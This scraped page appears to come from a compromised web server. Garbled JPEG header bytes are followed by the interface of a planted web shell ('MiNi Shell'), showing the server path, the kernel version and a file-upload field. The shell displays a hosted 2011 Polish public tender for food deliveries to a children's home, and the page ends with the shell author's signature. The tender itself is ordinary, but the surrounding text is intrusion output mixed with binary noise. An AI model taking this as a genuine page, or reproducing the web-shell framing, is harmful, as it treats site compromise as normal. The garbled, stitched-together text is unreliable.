JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110311/42356-N-2011.html

<p class="kh_header"><b>Psary: Zakup i sukcesywna dostawa żywności dla potrzeb kuchni Domu Dziecka im. Dominika Savio w Sarnowie</b><br>
<b>Numer ogłoszenia: 42356 - 2011; data zamieszczenia: 11.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Dziecka im. Dominika Savio w Sarnowie , ul. Wiejska 104, 42-512 Psary, woj. śląskie, tel. 32 267 21 46, faks 32 267 21 46.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i sukcesywna dostawa żywności dla potrzeb kuchni Domu Dziecka im. Dominika Savio w Sarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i sukcesywna dostawa żywności. Przedmiot zamówienia podzielony został na dwie części:
Dostawa obejmuje następujący asortyment:
Dla części I
Ananasy w syropie 560g	szt.	5
Batoniki typu  Baurity MIIK Grześki 50g	szt.	240
Batony  typu TWIX, KINDER 50g	Szt.	160
Brzoskwinia w syropie 850 g	Szt.	10
Budyń 60g	Szt.	70
Ciastka pepitki 100g	Szt.	100
Cukier	Kg.	3600
Cukierki czekoladowe - owocowe	Kg.	10
Cukierki czekoladowe - galaretka w czekoladzie	Kg.	20
Cukierki czekoladowe - trufle	Kg.	20
Cukierki czekoladowe - mieszkanka Wedlowska	kg	15
Cukier waniliowy  0,5 kg	Szt.	40
Cynamon 15g	Szt.	20
Czekolada gorzka 100g	Szt.	140
Czekolada biała 100g	Szt.	140
Czekolada mleczna z orzechami 100g	Szt.	140
Czekolada deserowa 100g typu Wedel	Szt.	220
Czekolada mleczna 100g	kg	240
Czekolada nadziewana - truskawkowa 100g	Szt.	60
Czekolada nadziewana - malinowa 100g	Szt.	140
Czekolada nadziewana - wiśniowa 100g	Szt.	140
Delicje szampańskie	Szt.	150
Drożdże piekarskie 100g	Szt.	120
Dżem brzoskwiniowy 280g	Szt.	200
Dżem czarna porzeczka 280g	Szt.	100
Dżem wiśniowy 280g	Szt.	100
Dżem truskawkowy 280g	Szt.	300
Fasola konserwowa czerwona 3,2 kg	Szt.	6
Fasola nasiona suche Jaś 1 kg	Szt.	260
Galaretka owocowa - wiśniowa 75g	Szt.	40
Galaretka owocowa - agrestowa 75g	Szt.	40
Galaretka owocowa - truskawkowa 75g	Szt.	40
Galaretka owocowa - poziomkowa 75g	Szt.	40
Galaretka owocowa - cytrynowa 75g	Szt.	40
Galaretka pomarańczowa 75g	Szt.	40
Groch 500g, 	Kg	120
Groszek konserwowy 400g	Szt.	60
Grzyby suszone	kg	30
Gulasz angielski  1900 g	Szt.	500
Hamburgery	Kg	50
Herbata granulowana 100g	Szt.	1700
Herbatniki typu Minipetitki dekorowane	Szt.	200
Czekolada Kinder  0pakowanie	Szt.	130
Chrzan 100/200  1l	Szt.	70
Chipsy solone 170g	Szt.	30
Chrzan 200ml	Szt.	22
Czosnek granulowany 1kg	Szt.	15
Imbir mielony 15g	Szt.	10
Jabłka suszone	kg.	5
Jabłka prażone 0,9 kg słoik	Szt.	90
Jabłka prażone 12 kg wiadro	Szt.	16
Kakao 100g 16%	Szt.	200
Kasza gryczana	Kg.	30
Kasza jęczmienna	Kg.	800
Kasza perłowa	Kg.	400
Kasza manna	Kg.	800
Kawa Inka 150g	Szt.	650
Kisiel porzeczkowy 77g	Szt.	30
Kisiel wiśniowy 77g	Szt.	30
Kisiel cytrynowy 77g	Szt.	30
Kisiel pomarańczowy 77g	Szt.	30
Kisiel bananowy 77g	Szt.	60
Kluski parowe /paczka 250g	Szt.	100
Kminek mielony 15 g	Szt.	100
Koncentrat pomidorowy 200g	Szt.	250
Koncentrat pomidorowy 1l	Szt.	100
Konfitura truskawkowa 240g	Szt.	25
Konfitura wiśniowa 240g	Szt.	20
Konfitura czarna porzeczka 240g	Szt.	20
Koncentrat grzybowy 920g	Szt.	50
Koncentrat grzybowy 300g	Szt.	20
Konserwa krakowska	Szt.	200
Kukurydza konserwowa 340g	Szt.	30
Kawa zbożowa Inka 150g	Szt.	700
Kurkuma 12g	Szt.	10
Kwasek cytrynowy 20g	Szt.	100
Kwasek cytrynowy 500g	Szt.	20
Liść laurowy 100g	Szt.	6
Masło orzechowe Duo Krem czekoladowy 350g	Szt.	100
Ferraro Nutella 630g	Szt.	300
Ferraro Nutella 385g	Szt.	200
Kruger krem truskawkowy 350g	Szt.	100
Krem czekoladowo - orzechowy 200g	Szt.	70
Krem czekoladowy 200g	Szt.	70
Bulion - Magi 6kg	Szt.	70
Majonez 850g	Szt.	85
Majonez 400 ml	Szt.	100
Majeranek 120g	Szt.	10
Mąka pszenna typ 500	Kg	400
Mąka pszenna typ 550	Kg	400
Mąka tortowa	Kg	400
Makaron dwujajeczny nitki	Kg	150
Makaron dwujajeczny kolanka	Kg.	400
Makaron czterojajeczny rurki	Kg.	250
Makaron czterojajeczny świdry	Kg.	410
Miód wielokwiatowy 1l	Szt.	60
Serek kanapkowy twarogowy 150g różne smaki	Szt.	150
Miód wielokwiatowy 400 ml	Szt.	60
Makaron czterojajeczny muszelki	Kg.	200
Makaron spaghetti	Kg.	80
Makaron kokardki	Kg.	20
Makrela w pomidorach 300g	Szt.	300
Markizy orzechowe 179g	Szt.	100
Markizy czekoladowe 179g	Szt.	100
Markizy śmietankowe 179g	Szt.	100
Masa makowa 850g	Szt.	10
Mleko pełne w proszku 400g	Szt.	650
Musztarda 1kg	Szt.	16
Musztarda 500g	Szt.	85
Musztarda 200g	Szt.	100
Napój jabłkowy kartoniki 200ml	Szt.	200
Napój jabłkowy z czerwonymi winogronami 200ml	Szt.	200
Napój pomarańczowy 200ml	Szt.	400
Napój bananowy 200ml	Szt.	400
Nektar ananasowy 0,33l	Szt.	170
Nektar brzoskwiniowy 0,33l	Szt.	400
Nektar czarna porzeczka 0,33l	Szt.	100
Nektar ananasowy z witaminami 0,33l	Szt.	100
Nektar wiśniowy 0,33l	Szt.	100
Ogórki konserwowe 4250g	Szt.	30
Ogórki konserwowe 850g	Szt.	100
Ocet 1l	Szt.	10
Olej słonecznikowy 1l	Szt.	600
Oliwki zielone w zalewie	kg	5
Oregano 300g	Szt.	15
Orzechy włoskie	Kg	1
Paluszki solone 100g typu Lajkonik	Szt.	100
Papryka mielona 1170g	Szt.	55
Papryka konserwowa czerwona 4250g	Szt.	20
Papryka konserwowa czerwona 650g 	Szt.	80
Paprykarz szczeciński 300g	Szt.	10
Pasztet z drobiu 160g	Szt.	1200
Pasztet z kaczki 160g	Szt.	500
Pasztet z gęsi 160g	Szt.	500
Pasztet mazowiecki	Kg	150
Pieprz naturalny mielony	Szt.	25
Pierniki alpejskie	Kg.	20
Płatki czekoladowe kulki  0,5 kg	Szt.	60
Płatki czekoladowe muszelki 0,5kg	Szt.	60
Płatki z owocami   500g	Szt.	120
Płatki kukurydziane 1kg	Szt.	120
Płatki z witaminami i żelazem CINIMINIS   0,5	Szt .	120
Płatki z miodem i orzechami 0,5	Szt.	120
Płatki owsiane błyskawiczne 400g	Szt.	10
Powidła śliwkowe 330g	Szt.	10
Proszek do pieczenia	Kg.	10
Przecier ogórkowy 350g	Szt.	160
Przyprawa do ryb 30g	Szt.	10
Sałatka meksykańska  1 kg	Szt.	20
Seler konserwowy mały 330	Szt.	30
Przyprawa do flaków  1 kg	Szt.	5
Jarzynka Kucharek 1kg	Szt.	10
Rodzynki	Kg.	10
Ryż biały 1kg	kg	500
Sałatka pikantna z makreli 125g	Szt.	100
Sałatka z czerwonej kapusty 1700g	Szt.	100
Sałatka szwedzka 2,5 kg	Szt.	150
Sałatka mazowiecka 2400g	Szt.	70
Sałatka rybna 125g	Szt.	200
Seler konserwowy 1700ml	Szt.	70
Serki typu Almette, BIeluchy, Turek     140 g	Szt.	950
Mąka ziemniaczana 1kg	Szt.	200
Śliwki suszone z pestką 1kg	Szt.	15
Sok buraczany 330ml	Szt.	40
Sok malinowy, Cytrynowy 570ml	Szt.	60
Sok marchwiowo truskawkowy 300ml	Szt.	200
Sok marchwiowo jabłkowo pomarańczowy 300ml	Szt.	200
Sok pomidorowy   1 l	Szt.	50
Sól biała 1kg	Kg	400
Ketchup 1kg	Szt.	100
Ketchup 250 g	Szt.	150
Ketchup 500g	Szt.	100
Sos do hamburgerów 960g	Szt.	100
Sos sojowy 150ml	Szt.	30
Sos tatarski 250ml	Szt.	70
Szczaw konserwowy 300g	Szt.	150
Tuńczyk konserwowy 1700g	Szt.	400
Wafle kakaowe	Kg.	30
Woda mineralna n/g 0,25l 	Szt.	100
Woda mineralna n/g 1,50l	Szt.	200
Woda mineralna n/g 5l	Szt.	150
Zacierka	Kg.	220
Żelatyna    1kg	Szt.	10
Ziele angielskie 500g	Szt.	10
Żurek śląski 480ml	Szt.	300
Ogórki kiszone kg	Kg	500
Mieszanka owocowa 7-składników 1kg	Kg	1500
Marchewka z groszkiem 1kg	Kg	350
Sucharki   1 kg	Szt.	40
Pieczarki konserwowe	Szt.	10
Biszkopty     0,5 kg	Szt.	150
Dla części II:
Jajka	szt	28000
Wykonawca zobowiązuje się do zaopatrywania Zamawiającego w artykuły spożywcze w pierwszym gatunku, z określonym terminem ważności oraz z cechami podanymi w SIWZ.
Wykonawca zobowiązuje się dostarczyć towar oraz  wnieść na I piętro siedziby Zamawiającego własnym transportem, na własny koszt i własne ryzyko.  Dostawa na koszt Wykonawcy musi nastąpić w dni robocze od godz. 6.00 - 14.00 do siedziby Zamawiającego. Wykonawca zobowiązuje się do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu lub całości dostawy.
Transport powinien odpowiadać wymogom HACCP
Zamawiający zastrzega sobie możliwość zakupu mniejszej ilości artykułów niż to określono w SIWZ z powodu zmian okoliczności, których nie można było wcześniej przewidzieć, na które Zamawiający nie miał wpływu. W sytuacji takiej Wykonawca nie będzie wnosił żadnych zastrzeżeń oraz roszczeń.
Wykonawca każdorazowo zobowiązany jest do realizacji części zamówienia w ciągu dwóch dni od momentu złożenia zamówienia za pomocą faksu; Niespełnienie powyższego warunku skutkować będzie karami wynikającymi z nieterminowych dostaw.
8Dostarczenie w miejsce artykułów wadliwych (np. przeterminowanych) artykułów wolnych od wad nie jest dopuszczalne (możliwe) tj. przypadku stwierdzenia przez Zamawiającego wadliwej partii dostarczonego towaru, reklamacja zostanie zgłoszona telefonicznie lub faksem. Wykonawca zobowiązuje się niezwłocznie do dostarczenia artykułów wolnych od wad..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia złozonego zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać: iż w ciągu ostatnich trzech lat zrealizował dwie dostawy zgodne z przedmiotem zamówienia, o zakresie i wartości min. 80 % (80% ceny ofertowej wykonawcy) przedmiotowego zamówienia wraz z minimum jednym dokumentem (np. referencją) potwierdzającym że dostawa wykazana przez Wykonawcę została wykonana należycie; oraz na podstawie oświadczenia złozonego zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia złozonego zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia złozonego zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie oświadczenia złozonego zgodnie z art. 22 ust. 1 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.starostwo.bedzin.pl/index.jsp?bipkod=/026/002<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Dziecka im. Dominika Savio 
42 - 512 Sarnów, ul. Wiejska 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.03.2011 godzina 09:00, miejsce: Dom Dziecka im. Dominika Savio 
42 - 512 Sarnów, ul. Wiejska 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com